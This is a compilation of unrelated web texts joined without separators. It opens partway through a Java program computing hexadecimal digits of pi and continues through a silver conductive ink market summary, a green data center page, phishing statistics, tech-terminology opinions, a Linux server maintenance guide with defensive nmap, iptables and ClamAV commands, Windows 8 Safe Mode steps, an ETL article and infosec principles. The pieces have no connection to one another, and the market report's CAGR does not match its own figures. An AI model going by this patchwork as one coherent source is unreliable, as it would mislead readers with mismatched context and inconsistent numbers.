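            double sum = 0.0;
            for (long k = 0; k < d; k++) {          // terms where 16^(d-k) is an integer
                long denom = 8 * k + j;
                sum = (sum + (double) powMod16(d - k, denom) / denom) % 1.0;
            }
            for (long k = d; k <= d + 20; k++) {    // small tail where 16^(d-k) <= 1
                sum = (sum + Math.pow(16.0, d - k) / (8 * k + j)) % 1.0;
            }
            return sum;
        }

        // n hexadecimal digits of pi starting at 0-based position d after the hex point.
        static String hexDigits(long d, int n) {
            double x = (4 * series(1, d) - 2 * series(4, d) - series(5, d) - series(6, d)) % 1.0;
            if (x < 0) x += 1.0;
            StringBuilder out = new StringBuilder();
            for (int i = 0; i < n; i++) {
                x *= 16.0;
                int digit = (int) x;
                out.append(Character.forDigit(digit, 16));
                x -= digit;
            }
            return out.toString();
        }

        public static void main(String[] args) {
            System.out.println(hexDigits(0, 12));  // expect the familiar 243f6a8885a3
        }
    }

Printing hexDigits(0, 12) should reproduce the leading hexadecimal digits 243f6a8885a3 of the fractional part of π, which is a handy self-check before asking for digits at a deep position.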
Silver conductive ink (SCI), apart from being a good conductor, offers a conductive native oxide layer, which usually forms on the surface. Silver pastes have been used for screen printing for a long time. The Europe silver conductive inks market was valued at $316.48 million in 2012, and is projected to reach $353.72 million by 2018, growing at a CAGR of 4.2% from 2013. Silver conductive inks are widely used in photovoltaics, which is driving demand for silver conductive inks in Europe. With advancing technology, conductive silver inks are compatible with almost every printing technique, such as inkjet, screen, gravure, and flexography. Nanosilver inks are new in this category and have the advantage of high conductivity and surface area, leading to the opening up of new markets. Silver conductive inks have various applications, such as photovoltaics, membrane switches, automotive, RFID/smart packaging, bio-sensors, and printed circuit boards.

The European chemical industry is a significant part of the region's economy. The industry is divided into four segments: base chemicals, specialty chemicals, pharmaceuticals, and consumer chemicals. Germany is the largest chemical producer in Europe, followed by France, Italy, and The Netherlands. These four countries together account for 64.0% of European chemical sales. In the past, most of Europe's chemical industry growth was driven by domestic sales, but these days the region's growth depends on both the domestic and the export markets. Germany is currently driving the European silver conductive inks market. The key countries covered in the Europe silver conductive inks market are Germany, the U.K., France and others. The types of silver conductive inks studied include silver flakes, silver nanoparticles, and silver nanowires.

Further, as part of its qualitative analysis, the Europe silver conductive inks market research report provides a comprehensive review of the important drivers, restraints, opportunities, and burning issues in the silver conductive inks market. The report also provides an extensive competitive landscape of the companies operating in this market. It also includes the company profiles of, and competitive strategies adopted by, various market players, including DuPont MCM (U.S.), NovaCentrix (U.S.), Henkel Electronics (U.S.), PChem Associates (U.S.), Heraeus (Germany) and Sun Chemical (U.S.).

With market data, you can also customize MMM assessments that meet your company's specific needs. Customize to get comprehensive industry standards and deep-dive analysis of the following parameters:
- Market size and forecast (deep analysis and scope)
- Competitive landscape with a detailed comparison of the portfolio of each company mapped at the regional and country level
- Analysis of forward chain integration as well as backward chain integration to understand the approach of business prevailing in the Europe conductive inks market
- Detailed analysis of competitive strategies, such as new product launches, expansions, and mergers & acquisitions, adopted by various companies and their impact on the Europe conductive inks market
- Detailed analysis of various drivers and restraints with their impact on the Europe conductive inks market
- Upcoming opportunities in the conductive inks market
- Trade data of the SCI market
- SWOT analysis for top companies in the conductive inks market
- Porter's five forces analysis for the conductive inks market
- PESTLE analysis for major countries in the conductive inks market
- New technology trends of the SCI market
The top question that we regularly hear is "What is a green data center?" With data centers now being one of the highest consumers of energy, they are likely to be one of the greatest costs for an enterprise. Our goal is not only to be greener than most data centers, but also to cost less. Our definition of a green data center includes many aspects. Here is a simple list of how we are green.

Power: We are powered 100% through renewable wind energy.

Cooling: In the average data center, a server requires as much energy (wattage) to cool it as it does to run it. This essentially doubles the cost of powering servers. However, our cooling system runs about 90% more energy efficiently than standard data center CRAC (computer room air conditioning) units. Our air-side economizer allows us to operate on approximately 1 watt for the server power and 0.2 watts for cooling. Furthermore, we have developed a hot-aisle/cold-aisle standardization across the data center to prevent hot and cold air from mixing, again improving our efficiency.

Cloud Computing / Virtualization: By offering cloud hosting through virtualization technology, we are able to consolidate physical servers to virtual servers at a 10:1 ratio. By consolidating even one server through our cloud servers, we take 4 tons of CO2 emissions out of the air and save up to 7,000 kWh in energy costs (about $700) each year. This also allows us to have a smaller than average facility (10,000 sq ft), since less space is required to house, power and cool the cloud infrastructure. Additional savings come from our cloud hosting because we keep close watch on server utilization. If the processing need is lower than usual, we have the ability to power down unneeded physical servers. Servers running idle can take almost as much power to run and cool as active servers do. In times of greater CPU need, we can simply power servers back on to meet the demands of our cloud environment. Balancing the load across a cloud server cluster can have a great impact on energy savings.

Office: Within our office environment, we have continued to build upon our sustainability initiatives. Here are some highlights.
- Use of recycled paper for printing, and printers that can print double sided
- Installed low-emission building materials, carpets and paints
- Green cleaning products are used to keep the facilities clean
- Recycling is available for waste products
- All electronics are recycled appropriately - servers, computers, phones/smart phones, etc.
- We buy refurbished products as available and appropriate

Landscaping: Our facility is located in an arid location; therefore, we have opted for a landscape design that is very xeric in nature. The water used to irrigate these plants is supplied by run-off from our evaporative cooling system.

We are always looking into new energy saving technologies that will continue to deliver high performance results to our customers. Although wind power comes at a premium energy cost, the energy savings we gain through our energy efficient methods net a cost saving to our company that we pass through to customers. On average, our clients see around a 10% cost savings on comparable services. We invite you to schedule a visit to our data center so you can see first-hand the green efforts in place.
There were nearly 100,000 incidents of phishing attacks reported in the UK last year as cybercriminals increasingly turned to online scams to trick users into divulging sensitive information. The figures, collated by the City of London Police's Action Fraud and the National Fraud Intelligence Bureau, put the exact number at 96,699 – which amounts to around 8,000 reports each month.

Unsurprisingly, email is the most popular channel via which cybercriminals are phishing their victims, accounting for over 68% of incidents. This compares to 12.5% who say they were contacted by phone and 9% who were contacted by text, the report claimed. Scams are frequently seasonal, with bank and HMRC-related phishing particularly popular in December, according to the police. The top email addresses that people reported having received emails from were: Do-Notemail@example.com, firstname.lastname@example.org and PQ8MPY@m.apple.com.

Deputy Head of Action Fraud Steve Proffitt argued that the phishing problem is not going away anytime soon. "It is a means for fraudsters to test the water with potential victims and see how many people they can hook into a scam. For the fraudsters, it is a low risk way of casting out their net and seeing what they can catch," he added. "If their emails are convincing enough they can yield high returns and people can easily be persuaded into parting with money or to click on links which then infect their computer with malicious software."

Users were urged to remain vigilant online, especially when opening attachments, clicking on links in unsolicited emails or responding to emails asking for personal or financial details. Rather than follow links to web pages, users should type in the web address of the site they want to visit directly, Action Fraud advised.
Organizations Using the Internet
Modified 03 November 2002

The historical empire of Assyria covered today's Northern Iraq, northern Iran, southeastern Turkey, and much of Syria. In many of those lands people of Assyrian descent are undergoing harsh oppression today.
- Assyrian Democratic Movement -- http://www.zowaa.com/. Also see the Qala d Ashur (Voice of Assyria) radio program and the RealAudio files at http://www.zowaa.com/ashur.
- A good overview of the history of the Assyrian people after the fall of Nineveh is at: http://www.ashur.com/DrParpola.htm
- Check the list at: http://www.mathaba.net/www/assyria/index.shtml
The language of technology is a moving target. As the technology changes, so do the usage models, business models and behaviors associated with it. So do the words. There are words people often use incorrectly. You don't have to be a linguist to do your tech talk right. Here are the most commonly misused words and phrases everyone should know, and how to use them.

When you put goggles or special glasses over your eyes, such as Samsung's Gear VR, next year's Oculus Rift or devices based on Google Cardboard, you see something that isn't there. If what you see is 100% computer generated, you're experiencing virtual reality (VR). But these same goggles are also capable of showing video. In fact, most of the content available on these platforms so far has been 360-degree video. Some of this video is just a flat moving image, and some is extremely sophisticated 3D video that shows depth. Either way, if what you're seeing was shot with a set of cameras, rather than created with a computer, then you're experiencing "immersive video," not "virtual reality." Calling 360-degree video "virtual reality" is a common mistake. You should call it "immersive video."

Another broad class of experiential glasses or goggles enables you to see the real world, but into this natural field of vision artificial, computer-generated content is placed. Google Glass is at one end of the spectrum; Microsoft's HoloLens and Magic Leap are at the other. Google Glass displays a rectangular screen, which is usually filled with the kind of notification content you might see on your phone. HoloLens and Magic Leap actually create the illusion that the computer-generated content is there and can interact with the real world -- for example, that virtual objects are sitting on real tables, or going under them. These experiences are usually referred to as "augmented reality." But they're usually not.

"Augmented reality" is just what it sounds like: reality that is augmented. The most widely used augmented reality app is probably Google's Word Lens app, which translates signs and menus into other languages. Here's me using the iPhone version in Italy. There's also a Google Glass version. The label "augmented reality" is appropriate because reality is the focus of attention -- the experience of real things is being enhanced by computer-supplied information or images. However, many of the applications for Glass, HoloLens, Magic Leap and other platforms insert information into the user's experience that is unrelated to reality. For example, Google Glass might show an incoming email notification. Magic Leap might play a game in which reality is just the background, and the content of the game is the main focus of attention. These experiences are called "mixed reality," not "augmented reality." Calling anything that combines the real with the virtual "augmented reality" is incorrect. The best phrase is usually "mixed reality."

The phrase "digital nomad" is dated. It usually refers to a person who becomes "location independent" and can live abroad or travel the world because work can be done over the Internet. It comes from the past, when using a laptop to connect to the Internet and do work from outside an office was rare. Nowadays, people work on their smartphones, tablets and laptops from anywhere all the time. So there's nothing special about using the Internet to work outside an office. "Digital nomad" is anachronistic -- like "color TV," "multimedia PC," or the "worldwide web."
Everyone has accepted as a mundane banality that TV is color, that PCs have speakers and that the web is global. Likewise, anyone who is away from the office -- at a Starbucks down the street or at a cyber cafe in India -- is of course able to connect to the Internet and get work done. "Digital nomad" is an obsolete term. Someone who lives in different locations at different times is simply a "nomad."

A unicorn, in Silicon Valley parlance, is a pre-IPO startup with a valuation of $1 billion or more. The only reason these startups are called unicorns is that they are so rarely seen. The term was coined two years ago by Aileen Lee, a venture capitalist and co-founder of Cowboy Ventures. At the time, there were fewer than 40. Now, there are at least 139 unicorns. More to the point, there are several startups worth more than $10 billion and there's one worth more than $50 billion -- Uber, which is the only "Ubercorn." We should all stop saying "unicorn." Startups with valuations over $1 billion aren't rare anymore.

People in technology, including entrepreneurs, tech executives, venture capitalists, journalists and others, have taken to referring to people who are not technical or not in the industry as "normals." The idea is that only an abnormal person would be into technology. In fact, the use of "normals" is condescending. It's a false compliment that implies the need for a euphemism to describe someone who doesn't know about or care about technology. It's a better idea to avoid this condescension and be specific. If we're talking about someone with a non-professional level of knowledge, then "lay person" will suffice. If we mean that someone is representative of the general public in some regard, then "average" -- as in "average consumer" or "average user" -- is the way to go. If we mean someone who's not an engineer or software developer, then be accurate and say "non-engineer" or "non-developer." "Normals" is a vague and condescending euphemism that should be avoided.

You've heard the word "drone" used to refer to any remote-controlled thing that flies -- from large military aircraft that can drop bombs to tiny consumer toys that can be controlled with a smartphone app. Some of these aircraft use artificial intelligence to pilot themselves, and others do not. But "drone" accurately applies only to unmanned aircraft that can fly by themselves and navigate using artificial intelligence. It's a reference to automation, not flying or remote control. Even some of the biggest and most expensive military "drones" aren't drones at all, but remotely piloted unmanned aerial vehicles (UAVs). None of the consumer devices are "drones." (Sure, give it a year or two and A.I.-controlled drones will be sold to consumers. But for now, consumer drones don't exist.) A better term for consumer remote-controlled devices is "quadcopter," which simply refers to the number of propellers. The use of "drone" to refer to consumer quadcopters is incorrect.

Words matter and technology is global. If we want to be clear and understand each other, and also accurately represent reality, it's a good idea to be precise in how we talk tech.
Keeping your server up to date is one of the most important maintenance tasks that needs to be done. Before applying updates to your server, confirm that you have a recent backup, or a snapshot if working with a virtual machine, so that you have the option of reverting back if the updates cause any unexpected problems. If possible you should aim to test updates on a test server first before applying them to a production server. This allows you to confirm that the updates will not break your server and will be compatible with any other packages or software that you may be running.

You can update all packages currently installed on your server by running a 'yum update'. Ideally this should be done at least once a month so that you have the latest security patches, bug fixes, and improved functionality and performance. You can automate the update by making use of crontab to check for and apply updates whenever you like.

Web applications, such as WordPress/Drupal/Joomla, also need to be updated frequently, as these sorts of applications act as a gateway to your server, usually by being more accessible than direct server access and by allowing public access in from the Internet. Many web applications also have third-party plugins installed, which can be coded by anyone and can potentially contain many security vulnerabilities. As such it is critical to update these sorts of applications very frequently. These content management systems are not managed by yum, so they will not be updated with a 'yum update' like the other packages installed. The updates are usually provided directly through the application itself - if you're unsure, contact the application provider.

If you ran a 'yum update' as previously discussed, check to see if the kernel was listed as an update. Alternatively you can actively update your kernel with a 'yum update kernel'. The Linux kernel is the core of the Linux operating system and is updated regularly to include security patches, bug fixes and added functionality. Once the new kernel has been installed you must reboot your server to complete the process. Before you reboot, run the command 'uname -r', which will print the kernel version that you are currently booted into. After the reboot, run 'uname -r' again and confirm that the newer version installed with yum is displayed. If the version number does not change you may need to investigate which kernel is booted in /boot/grub/grub.conf - yum updates this file by default to boot the updated kernel.

To increase security you should review who has access to your server. In any given organization you may have staff who have left but still have accounts with access; these should be removed or disabled. There may also be accounts with sudo access, meaning they have root permissions, that should no longer be granted such permissions. This should be reviewed often to avoid a possible security breach: granting root access is very powerful. You can check the /etc/sudoers file to see who has root access, and if you need to make changes do so with the 'visudo' command. You can view recent logins with the 'last' command to see who has been logging into the server.

Firewall rules should also be reviewed from time to time to ensure that you are only allowing required inbound and outbound traffic.
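As a quick, concrete illustration of such a port and firewall review (the target address below is a hypothetical example - substitute one of your own hosts), you might scan the server from another machine and compare the result against the rules loaded on the server itself:

# From a separate host: scan all TCP ports and list only those found open.
nmap -p- --open 203.0.113.10

# On the server itself: list the currently loaded iptables rules with counters.
iptables -L -v -n

Any port that shows up in the scan but is not explained by a service you knowingly run, or allowed by a rule you recognize, is worth investigating.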
Requirements for a server change, and as packages are installed and removed the ports it is listening on may change, potentially introducing vulnerabilities, so it is important to restrict this traffic correctly. This is typically done in Linux with iptables, or perhaps with a hardware firewall that sits in front of the server. You can test for open ports using nmap, and view the current rules on the server by running 'iptables -L -v'.

User accounts should be configured to expire after a period of time; common periods are anywhere between 30-90 days. This is important so that the user password is only valid for a set amount of time before the user is forced to change it. It increases security because a compromised account cannot be used indefinitely: the password will change to something different, so an attacker will not maintain access through that account. If your accounts are in an LDAP directory, such as Active Directory, this can be set for the accounts there; otherwise in Linux you can set it on a per-account basis (a short example using chage appears a little further down). However, this is not as scalable as using a directory because you need to implement the changes on all of your servers individually, which takes time.

It is important to back up your servers in case of data loss. It is equally important to actually test that your backups work and that you can successfully complete a restore. Check that your backups are working on a daily or weekly basis - most backup software can notify you if a backup task fails, and failures should be investigated. It is a good idea to perform a test restore every few months or so to ensure that your backups are working as intended. This may sound time consuming but it is well worth it. There are countless stories of backups appearing to work until all the data is lost; only then do people realise that they are not actually able to restore the data from backup. You can back up locally to the same server, which is not recommended, or you can back up to an external location either on your network or out on the Internet - this could be your own server or a cloud storage solution like Amazon S3 or Acronis Backup for Linux Server.

If your server is used in production you most likely have it monitored for various services. It is important to check and confirm that this monitoring is working as intended and that it is reporting correctly, so that you know you will be alerted if there are any issues. Incorrect firewall rules may disrupt monitoring, or your server may be performing different roles now and so may need to be monitored for additional services. If you're using Anturis for monitoring you will be alerted if there are any problems, such as a failure to connect, so you will be able to fix such issues quickly and will not have to regularly check that your servers are still being monitored correctly. If you have a server monitored already it is also very easy to add or remove monitors to fit the current role of the server so that you can monitor the required services.

Resource usage is typically checked as a monitoring activity. It is, however, good practice to observe long-term monitoring data in order to get an idea of any resource increases or trends which may indicate that you need to upgrade a component of your server so that it is capable of working under the increased load.
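Referring back to the account-expiry point above, here is a minimal sketch of setting password aging on a single local account with chage. The username and the 60-day/7-day values are hypothetical - pick periods that match your own policy:

# Force the password for user 'alice' to expire every 60 days,
# with a warning starting 7 days before expiry.
chage -M 60 -W 7 alice

# Review the aging settings currently applied to the account.
chage -l alice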
This information can be monitored with Anturis; you can view CPU usage and load levels, free disk space, free physical memory and other SNMP variables. This is beneficial because you can monitor all of your servers from one central location and determine if any need to be upgraded based on past resource usage and performance levels, as well as receive alerts when a set threshold is reached, which can help indicate that you need to upgrade or otherwise investigate where the increase has come from.

Critical hardware problems will likely show up in your monitoring and be obvious, as the server may stop working correctly. You can potentially avoid this scenario by monitoring your system for hardware errors, which may give you a heads up that a piece of hardware is having problems and should be replaced before it fails. You can use mcelog, which processes machine checks (namely memory and CPU errors) on 64-bit Linux systems - it can be installed with 'yum install mcelog' and then started with '/etc/init.d/mcelogd start'. By default mcelog will check hourly using crontab and report any problems into /var/log/mcelog, so you will want to review this file regularly, every week or so.

You can both save disk space and reduce your attack surface by removing old and unused packages from your server, hardening it as there is less code available for an attacker to make use of. The command 'yum list installed' displays all packages currently installed on your server, and 'yum remove package-name' will remove a package - just be sure you know what the package is and that you actually want to remove it. Be careful when removing packages with yum; if you remove a package that another package depends on, the dependent package will also be removed, which can potentially remove a lot of things at once. After you run the command it will confirm the list of packages that will be removed, so carefully double check it before proceeding.

By default, after 180 days or 20 mounts (whichever comes first) your file systems will be checked with e2fsck. This should be run occasionally to ensure disk integrity and to repair any problems. You can force a disk check by running 'touch /forcefsck' and then rebooting the server (the file will be removed on the next boot), or with the 'shutdown -rF now' command to force a disk check on the next boot and perform the reboot now. Alternatively you can use -f instead of -F to skip the disk check; this can be useful, for example, if you have just performed a kernel update, need to reboot, and want the server back up as soon as possible rather than waiting for the check to complete. The mount count can be modified using the tune2fs command - the defaults are pretty good, however 'tune2fs -c 50 /dev/sda1' will increase the mount count to 50 so a file system check will happen after the file system has been mounted 50 times. Similarly, 'tune2fs -i 210 /dev/sda1' will change the disk so that it is only checked after 210 days rather than 180.

If you look through /var/log you will notice that there are a lot of different log files on the server which are continually written to with different information. This is sometimes useful, but most of the time it is irrelevant, leading to a large amount of information to go through. Logwatch can be used to monitor your servers' logs and to email the administrator a summary on a daily or weekly basis - you can control it via crontab.
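As a small illustration of the kind of Logwatch run you might wire into cron (the mail address is a placeholder, and the options shown are just one reasonable combination):

# Summarize yesterday's logs at medium detail and mail the report to the admin.
logwatch --range yesterday --detail Med --mailto admin@example.com

The same command can be dropped into /etc/cron.daily/ (or a crontab entry) so the summary arrives automatically each morning.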
Logwatch can also be used to send a summary of other useful server information, such as the disk space in use on all partitions on the server, so it's a good way to get up-to-date notifications from your servers. You can install the package with 'yum install logwatch'.

With Anturis you can put even more granular checks in place for the log files. For example, if you want to be alerted about a particular type of error you can set up a log file monitor that will let you know every time that event happens. This means you don't have to manually connect to the server and regularly review the log files for problems, allowing you to proactively monitor issues rather than reactively detect them.

In order to stay secure it is important to scan your server for malicious content. ClamAV is an open source antivirus engine which detects trojans, malware and viruses and works well with Linux. You can set a cron job to run a weekly scan - at 3am for instance - and then email you a report outlining the results (a sample wrapper script is sketched below). Depending on how much content you have, the scan may take a while, so it is recommended that you schedule an intensive scan once a week at a low resource usage time, such as on the weekend at night. Check the crontab and the /var/log/cron log file to ensure that the scans are running as intended. You can also configure an email summary to be sent to you, so you might want to confirm that you are receiving these alerts.
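Here is one minimal way such a weekly scan could be wired up. This is a sketch only, with hypothetical paths and recipient, assuming the clamav and mailx packages are installed; adjust the excluded directories and schedule to suit your system:

#!/bin/bash
# Save as /etc/cron.weekly/clamav-scan (or schedule via crontab) so it runs weekly.
LOG=/var/log/clamav/weekly-scan.log

# Refresh virus signatures first, quietly.
/usr/bin/freshclam --quiet

# Recursive scan of the filesystem; print only infected files and log the result.
/usr/bin/clamscan -r -i / --exclude-dir='^/(sys|proc|dev)' --log="$LOG"

# Mail the report to the administrator (placeholder address).
mail -s "Weekly ClamAV report for $(hostname)" root@example.com < "$LOG"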
MOSCOW, Russia, May 27 — Having passed all its tests, a supercomputer nicknamed "Lobachevsky" can demonstrate a performance of 600 teraflops. It is the second most powerful supercomputer installed at a Russian university, after MSU's "Lomonosov." This complex equipment was provided by UNN's partner – one of the leading companies in the world – Niagara Computers, said UNN Vice-Rector Nikita Avralev.

The USA and Europe have been leading the way in the creation, storage, processing, and management of data using supercomputers. However, having realized that only with superior information technology can it become a leading power in the world, Russia has begun its ascent toward the top positions, suggests the Dean of the Faculty of Computational Mathematics and Cybernetics, Director of the Center for Computer Modeling, Doctor of Technology Viktor Gergel. That is why UNN established a specialized laboratory for supercomputer research in the fields of biomedicine and plasma physics. Devices and systems nowadays are becoming more and more complex, which is why their full-scale production can become quite a costly undertaking. It is much easier to test their reliability using preliminary calculations made on a digital model, he says.

University researchers work on a large variety of supercomputing applications for bioinformatics, for example creating models of the human brain and heart and processing tomography images. Students work on engineering applications of supercomputing, such as railroad schedule planning and air-cushion ship design. Without this instrument, there will be no progress either in research or in production.

"Lobachevsky" will become one of the top 50 most powerful supercomputers in the world, claims the Research Director of the Department of Supercomputer Technology of UNN, Alexander Pukhov. Among other applications, it will be used to model processes in the field of particle acceleration. As of today, approximately 200 million roubles have been invested in the project.

Source: RIA Novosti
Safe Mode is a Windows mode that uses only the most basic drivers and programs required to start Windows. This mode will also not launch any programs that are set to start automatically when Windows starts. This makes Safe Mode very useful for diagnosing hardware driver problems and computer infections in Windows 8. It can also be useful when you want to uninstall a program or delete a file that you are unable to remove when Windows is started normally.

To access Safe Mode in Windows 8, you need to do so via the Advanced Startup options menu. To restart your computer into the Advanced Startup options menu, go to the Windows 8 Start Screen and type Advanced. When the search results appear, click on the Settings category as shown below. Now click on the option labeled Advanced startup options and you will be brought to the General PC Settings screen. Scroll down to the bottom until you see an option labeled Advanced startup. Now click on the Troubleshoot button and then the Advanced options button. You will now be at the Advanced options screen, where you should click on the Startup Settings option. At the Startup Settings screen, click on the Restart button. Your computer will be restarted and brought into the Startup Settings menu as shown below.

You can start Safe Mode in Windows 8 from this screen. There are three possible Safe Mode options that you can choose from, which are described below:

Enable Safe Mode - This version of Safe Mode starts Windows 8 using the most basic drivers required to get Windows to run. It will not start any programs or the networking system.

Enable Safe Mode with Networking - This version of Safe Mode starts Windows 8 using the most basic drivers required to get Windows to run. It will not start any programs automatically, but will start the networking subsystem so that you can access the Internet. This is the most useful Safe Mode version, as it allows you to download any tools that you may require, as well as update anti-virus programs in case you wish to scan your computer.

Enable Safe Mode with Command Prompt - This version of Safe Mode starts Windows 8 using the most basic drivers required to get Windows to run, but does not start the Windows shell. This means that you will not see the desktop, but will instead be shown the command prompt screen where you can type commands. This version will also not start any programs or the networking subsystem. This Safe Mode method can be useful if you are cleaning up an infection that is started when the Windows shell, or Desktop, is started.

Select the Safe Mode option you want by pressing the corresponding option number. Windows will then boot into the Safe Mode version that you requested, where you will be able to log in. Once you log in, you will be at the classic Windows desktop, which will have the words Safe Mode written in each of the corners. You can now use the computer as normal and resolve any issues that required you to boot into Safe Mode. If you need to get back to the Windows Start Screen, you can press the Alt button on your keyboard. If you have any questions about this process, please ask in the Windows 8 Forum.
Big Data may bring with it big changes in the actual data flow involved in the data analysis process. Data analysis is often preceded by a process called ETL, which preps and collects the data that is to be analyzed. The ETL (Extract-Transform-Load) process consists of the following three steps:
- Extract data from the source
- Transform and possibly clean the data
- Load it into the target system for analysis

ETL, the process of transforming and loading data into a target system for analysis, has traditionally been a long and tedious one, often resulting in lags of weeks or even months from when data was first collected until it reached a point where it could be analyzed. Now, newer systems are bringing improvements and efficiencies. Increasingly, data is being collected and moved in near real time to newer systems with Big Data processing capabilities, like Hadoop. These Big Data systems act as a central data repository and can provide near real time analysis. While data still needs to be extracted from applications, very often data is first loaded into a repository like Hadoop and transformed there. Rather than ETL, the new process is more like ELT, with transformation happening as the last step in the target system (a minimal sketch of this pattern appears at the end of this article).

Some users of Hadoop, like Sears Holdings, are declaring that the ELT approach means "death to ETL" and that it provides a solution to many of the problems and expense that ETL has caused. The CTO of Sears Holdings, who is also CEO of Metascale, said that "The Holy Grail in data warehousing has always been to have all your data in one place so you can do big models on large data sets, but that hasn't been feasible either economically or in terms of technical capabilities. With Hadoop we can keep everything, which is crucial because we don't want to archive or delete meaningful data… ETL is an antiquated technique, and for large companies it's inefficient and wasteful because you create multiple copies of data. Everybody used ETL because they couldn't put everything in one place, but that has changed with Hadoop, and now we copy data, as a matter of principle, only when we absolutely have to copy."

Newer technologies like Hadoop have certainly created efficiencies and brought improvements to how data analysis is done. But the basic components of the ETL process still live on and really can't be eliminated unless a business finds it possible to standardize on a single central repository for native use by all applications. Without that, data still needs to be extracted from applications in order to move it into an analysis repository like Hadoop. Once there, data still needs to be cleaned and appropriately transformed in order to process it. And, at some point, whether before or after data transformation, the data needs to be loaded into the target system.

The CTO of Informatica pointed out that whether you use newer Big Data technologies or continue to use data warehousing techniques, there are still problems that have to be addressed which just don't go away. Those problems include: profiling data, discovering relationships between data, handling metadata, explaining context, accessing data, transforming data, cleansing data, and governing data for compliance.
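To make the ELT pattern concrete, here is a minimal sketch of what "load first, transform in the target" might look like on a Hadoop cluster. Everything in it is hypothetical - the paths, table names and the choice of Hive as the transformation engine - and the same idea applies equally to Pig, Spark or other SQL-on-Hadoop tools:

# Extract: the source application has already exported a raw, uncleansed CSV.

# Load: land the raw extract in HDFS as-is, with no transformation on the way in.
hdfs dfs -mkdir -p /data/raw/orders/2014-06-01
hdfs dfs -put /exports/orders_2014-06-01.csv /data/raw/orders/2014-06-01/

# Transform: cleanse and reshape inside the cluster, where the data already lives.
hive -e "
INSERT OVERWRITE TABLE analytics.orders_clean PARTITION (ds = '2014-06-01')
SELECT order_id,
       CAST(amount AS DECIMAL(10,2)),
       UPPER(TRIM(region))
FROM   raw.orders_ext
WHERE  ds = '2014-06-01'
  AND  order_id IS NOT NULL;"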
Information security is such a broad discipline that it's easy to get lost in a single area and lose perspective. The discipline covers everything from how high to build the fence outside your business all the way to how to harden a Windows 2003 server. It's important, however, to remember not to get caught up in the specifics. Each best practice is tied directly to a higher, more philosophical security concept, and those concepts are what I intend to discuss here.

Eric Cole's Four Basic Security Principles

To start with, I'd like to cover Eric Cole's four basic security principles. These four concepts should constantly be on the minds of all security professionals.

- Know Thy System

Perhaps the most important thing when trying to defend a system is knowing that system. It doesn't matter if it's a castle or a Linux server — if you don't know the ins and outs of what you're actually defending, you have little chance of being successful. A good example of this in the information security world is knowledge of exactly what software is running on your systems. What daemons are you running? What sort of exposure do they create? A good self-test for someone in a small to medium-sized environment would be to randomly select an IP from a list of your systems and see if you know the exact list of ports that are open on the machine. A good admin should be able to say, for example, "It's a web server, so it's only running 80, 443, and 22 for remote administration; that's it" — and so on for every type of server in the environment. There shouldn't be any surprises when seeing port scan results. What you don't want to hear in this sort of test is, "Wow, what's that port?" Having to ask that question is a sign that the administrator is not fully aware of everything running on the box in question, and that's precisely the situation we need to avoid.

- Least Privilege

The next über-important concept is that of least privilege. Least privilege simply says that people and things should only be able to do what they need to do their jobs, and nothing else. The reason I include "things" is that admins often configure automated tasks that need to be able to do certain things — backups, for example. What often happens is the admin will just put the user doing the backup into the domain admins group — even if they could get it to work another way. Why? Because it's easier. Ultimately this is a principle that is designed to conflict directly with human nature, i.e. laziness. It's always more difficult to give granular access that allows only specific tasks than it is to give a higher echelon of access that includes what needs to be accomplished. This rule of least privilege simply reminds us not to give in to the temptation to do that. Don't give in. Take the time to make all access granular, and at the lowest level possible.

- Defense In Depth

Defense In Depth is perhaps the least understood concept of the four. Many think it's simply stacking three firewalls instead of one, or using two antivirus programs rather than one. Technically this could apply, but it's not the true nature of Defense In Depth. The true idea is that of stacking multiple types of protection between an attacker and an asset. And these layers don't need to be products — they can be applications of other concepts themselves, such as least privilege. Let's take the example of an attacker on the Internet trying to compromise a web server in the DMZ.
This could be relatively easy given a major vulnerability, but with an infrastructure built using Defense In Depth, it can be significantly more difficult. The hardening of routers and firewalls, the inclusion of IPS/IDS, the hardening of the target host, the presence of host-based IPS on the host, anti-virus on the host, and so on — any of these steps can potentially stop an attack from being fully successful. The idea is that we should think in reverse — rather than thinking about what needs to be put in place to stop an attack, think instead of everything that has to happen for it to be successful. Maybe an attack had to make it through the external router, the firewall, the switch, get to the host, execute, make a connection outbound to a host outside, download content, run that, and so on. What if any of those steps were unsuccessful? That's the key to Defense In Depth — put barriers in at as many points as possible. Lock down network ACLs. Lock down file permissions. Use network intrusion prevention, use intrusion detection, make it more difficult for hostile code to run on your systems, make sure your daemons are running as the least privileged user, and so on.

The benefit is quite simple — you get more chances to stop an attack from becoming successful. It's possible for someone to get all the way in, all the way to the box in question, and be stopped by the fact that the malicious code in question wouldn't run on the host. But maybe when that code is fixed so that it would run, it'll then be caught by an updated IPS or a more restrictive firewall ACL. The idea is to lock down everything you can at every level. Not just one thing, everything — file permissions, stack protection, ACLs, host IPS, limiting admin access, running as limited users — the list goes on and on. The underlying concept is simple — don't rely on single solutions to defend your assets. Treat each element of your defense as if it were the only layer. When you take this approach you're more likely to stop attacks before they achieve their goal.

- Prevention Is Ideal, But Detection Is A Must

The final concept is rather simple but extremely important. The idea is that while it's best to stop an attack before it's successful, it's absolutely crucial that you at least know it happened. As an example, you may have protections in place that try to keep code from being executed on your system, but if code is executed and something is done, it's critical that you are alerted to that fact and can take action quickly. The difference between knowing about a successful attack within 5 or 10 minutes vs. finding out about it weeks later is astronomical. Often, having the knowledge early enough can result in the attack not being successful at all, i.e. maybe they get on your box and add a user account, but you get to the machine and take it offline before they are able to do anything with it. Regardless of the situation, detection is an absolute must because there's no guarantee that your prevention measures are going to be successful.

The CIA Triad

The CIA triad is a very important trio in information security. "CIA" stands for Confidentiality, Integrity, and Availability. These are the three elements that everyone in the industry is trying to protect. Let's touch on each one of these briefly.

- Confidentiality: Protecting confidentiality deals with keeping things secret. This could be anything from a company's intellectual property to a home user's photo collection.
Anything that attacks one's ability to keep private what they want kept private is an attack against confidentiality.

- Integrity: Integrity deals with making sure things are not changed from their true form. Attacks against integrity are those that try to modify something that's likely going to be depended on later. Examples include changing prices in an ecommerce database, or changing someone's pay rate on a spreadsheet.

- Availability: Availability is a highly critical piece of the CIA puzzle. As one may expect, attacks against availability are those that make it so that the victim cannot use the resource in question. The most famous example of this sort of attack is the Denial of Service attack. The idea here is that nothing is being stolen, and nothing is being modified. What the attacker is doing is keeping you from using whatever it is that's being attacked. That could be a particular server, or even a whole network in the case of bandwidth-based DoS attacks.

